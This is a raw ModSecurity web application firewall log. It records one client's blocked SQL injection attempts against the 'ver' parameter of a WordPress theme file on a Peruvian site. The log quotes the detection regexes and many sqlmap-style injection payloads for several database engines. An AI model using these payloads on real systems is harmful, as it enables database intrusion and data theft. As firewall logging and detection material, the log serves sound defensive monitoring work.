[id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47) AND 2204=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (2204=2204) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(98)||CHR(107)||CHR(113)) AS NUMERIC) AND (1318=1318"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExOxoAeojmxWlFps7whAAAANY"] [Fri Jul 12 08:35:56.271176 2024] [:error] [pid 30143:tid 139783890859776] [client 141.98.81.44:37938] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 2204=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (2204=2204) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(98)||CHR(107)||CHR(113)) AS NUMERIC)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExPBoAeojmxWlFps7whQAAAMU"] [Fri Jul 12 08:35:59.023376 2024] [:error] [pid 30143:tid 139783762323200] [client 141.98.81.44:37940] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47') AND 2204=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (2204=2204) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(98)||CHR(107)||CHR(113)) AS NUMERIC) AND ('gAPY'='gAPY"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExPxoAeojmxWlFps7whgAAAMw"] [Fri Jul 12 08:35:59.267828 2024] [:error] [pid 30143:tid 139783770715904] [client 141.98.81.44:37942] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47' AND 2204=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (2204=2204) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(98)||CHR(107)||CHR(113)) AS NUMERIC) AND 'AGGr'='AGGr"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExPxoAeojmxWlFps7whwAAAMs"] [Fri Jul 12 08:36:00.195221 2024] [:error] [pid 30143:tid 139783728752384] [client 141.98.81.44:37944] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47%' AND 2204=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (2204=2204) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(98)||CHR(107)||CHR(113)) AS NUMERIC) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExQBoAeojmxWlFps7wiAAAANA"] [Fri Jul 12 08:36:00.439856 2024] [:error] [pid 30143:tid 139783804286720] [client 141.98.81.44:37946] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 2204=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (2204=2204) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(98)||CHR(107)||CHR(113)) AS NUMERIC)-- Xbvd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExQBoAeojmxWlFps7wiQAAAMc"] [Fri Jul 12 08:36:00.677191 2024] [:error] [pid 30143:tid 139783779108608] [client 141.98.81.44:37948] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47) AND 5931=CONVERT(INT,(SELECT CHAR(113) CHAR(113) CHAR(98) CHAR(106) CHAR(113) (SELECT (CASE WHEN (5931=5931) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(98) CHAR(107) CHAR(113))) AND (5021=5021"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExQBoAeojmxWlFps7wigAAAMo"] [Fri Jul 12 08:36:00.919147 2024] [:error] [pid 30143:tid 139783753930496] [client 141.98.81.44:37950] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47 AND 5931=CONVERT(INT,(SELECT CHAR(113) CHAR(113) CHAR(98) CHAR(106) CHAR(113) (SELECT (CASE WHEN (5931=5931) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(98) CHAR(107) CHAR(113)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExQBoAeojmxWlFps7wiwAAAM0"] [Fri Jul 12 08:36:01.176875 2024] [:error] [pid 30143:tid 139783720359680] [client 141.98.81.44:37952] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47') AND 5931=CONVERT(INT,(SELECT CHAR(113) CHAR(113) CHAR(98) CHAR(106) CHAR(113) (SELECT (CASE WHEN (5931=5931) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(98) CHAR(107) CHAR(113))) AND ('WoJF'='WoJF"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExQRoAeojmxWlFps7wjAAAANE"] [Fri Jul 12 08:36:01.436525 2024] [:error] [pid 30143:tid 139783737145088] [client 141.98.81.44:37954] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47' AND 5931=CONVERT(INT,(SELECT CHAR(113) CHAR(113) CHAR(98) CHAR(106) CHAR(113) (SELECT (CASE WHEN (5931=5931) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(98) CHAR(107) CHAR(113))) AND 'FMRp'='FMRp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExQRoAeojmxWlFps7wjQAAAM8"] [Fri Jul 12 08:36:01.688722 2024] [:error] [pid 30143:tid 139783670003456] [client 141.98.81.44:37956] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47%' AND 5931=CONVERT(INT,(SELECT CHAR(113) CHAR(113) CHAR(98) CHAR(106) CHAR(113) (SELECT (CASE WHEN (5931=5931) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(98) CHAR(107) CHAR(113))) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExQRoAeojmxWlFps7wjgAAANc"] [Fri Jul 12 08:36:01.949613 2024] [:error] [pid 30143:tid 139783924430592] [client 141.98.81.44:37958] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:ver: 1.8.5.47 AND 5931=CONVERT(INT,(SELECT CHAR(113) CHAR(113) CHAR(98) CHAR(106) CHAR(113) (SELECT (CASE WHEN (5931=5931) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(98) CHAR(107) CHAR(113)))-- IVgL"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExQRoAeojmxWlFps7wjwAAAME"] [Fri Jul 12 08:36:02.334218 2024] [:error] [pid 29519:tid 139783890859776] [client 141.98.81.44:37960] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47) AND 2000=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (2000=2000) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(98)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND (9343=9343"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExQjEhNOprNgeRyDcP5gAAAIU"] [Fri Jul 12 08:36:02.637309 2024] [:error] [pid 29518:tid 139783720359680] [client 141.98.81.44:37962] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 2000=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (2000=2000) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(98)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExQqg1rY6w-xq1eShSTwAAAFE"] [Fri Jul 12 08:36:02.917526 2024] [:error] [pid 30143:tid 139783916037888] [client 141.98.81.44:37964] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47') AND 2000=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (2000=2000) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(98)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND ('VUaD'='VUaD"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExQhoAeojmxWlFps7wkAAAAMI"] [Fri Jul 12 08:36:03.183829 2024] [:error] [pid 30143:tid 139783661610752] [client 141.98.81.44:37966] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47' AND 2000=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (2000=2000) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(98)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'kpqM'='kpqM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExQxoAeojmxWlFps7wkQAAANg"] [Fri Jul 12 08:36:03.451241 2024] [:error] [pid 29517:tid 139783737145088] [client 141.98.81.44:37968] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47%' AND 2000=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (2000=2000) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(98)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExQ_UCh5vf5PuAcijj8AAAAA8"] [Fri Jul 12 08:36:03.731813 2024] [:error] [pid 29518:tid 139783728752384] [client 141.98.81.44:37970] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47 AND 2000=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (2000=2000) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(98)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL)-- LRqc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/scrollReveal.js"] [unique_id "ZpExQ6g1rY6w-xq1eShSUAAAAFA"] [Fri Jul 12 08:36:04.062033 2024] [:error] [pid 29517:tid 139783670003456] [client 141.98.81.44:37972] [client 141.98.81.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7171626a71 found within ARGS:ver: (SELECT 3918 FROM(SELECT COUNT(*),CONCAT(0x7171626a71,(SELECT (ELT(3918=3918,1))),0x7170626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"] [severity "CRITICAL"] [ver 